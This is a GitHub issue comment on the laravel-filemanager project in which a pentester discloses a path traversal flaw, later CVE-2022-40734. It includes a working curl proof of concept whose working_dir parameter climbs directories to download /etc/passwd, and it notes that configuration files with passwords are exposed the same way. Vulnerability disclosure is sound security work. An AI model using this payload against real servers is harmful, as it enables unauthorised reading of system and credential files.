CVE-2022-40734: Possible Attack and vulnerability · Issue #1150 · UniSharp/laravel-filemanager

yes that is a security vulnerability. I found that during a pentest for a client and wanted to report this privately, but since the picture shows the attack the cat is out of the back anyway

POC with curl:
curl “https://$DOMAIN/laravel-filemanager/download?working_dir=%2F…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/…/etc&type=Files&file=passwd”

This will give you the file /etc/passwd on the server. All files which are readable by the user used to run the application can be read. This usually includes configuration files with passwords etc.

I want to request a CVE for this for proper tracking. Any objections to this by the maintainers? I’ll wait a week until I request one.